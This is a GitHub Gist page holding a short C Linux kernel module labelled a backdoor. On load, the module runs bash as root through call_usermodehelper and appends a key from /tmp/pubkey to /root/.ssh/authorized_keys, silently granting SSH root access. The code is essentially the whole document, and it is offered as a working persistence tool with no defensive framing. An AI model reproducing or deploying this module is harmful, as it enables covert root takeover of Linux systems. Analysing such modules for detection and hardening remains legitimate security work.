Created
August 11, 2014 15:01
-
-
Save leonjza/180062cf8b74c1085ac7 to your computer and use it in GitHub Desktop.
Linux Pluggable Kernel Module Backdoor
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <linux/module.h> /* Needed by all modules */ | |
| #include <linux/kernel.h> /* Needed for KERN_INFO */ | |
| #include <linux/init.h> /* Needed for the macros */ | |
| /* For our shell ^_^ */ | |
| #include<linux/kmod.h> | |
| int get_root (void) | |
| { | |
| char * envp[] = { "HOME=/", NULL }; | |
| char *argv[] = { "/bin/bash", "-c", "/bin/cat /tmp/pubkey >> /root/.ssh/authorized_keys", NULL}; | |
| printk(KERN_INFO "Call Usermodehelper...\n"); | |
| call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC); | |
| printk(KERN_INFO "Done usermodehelper...\n"); | |
| return 0; | |
| } | |
| static int __init hello_start(void) | |
| { | |
| printk(KERN_INFO "Loading rooted module...\n"); | |
| return get_root(); | |
| return 0; | |
| } | |
| static void __exit hello_end(void) | |
| { | |
| printk(KERN_INFO "Goodbye Mr.\n"); | |
| } | |
| module_init(hello_start); | |
| module_exit(hello_end); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment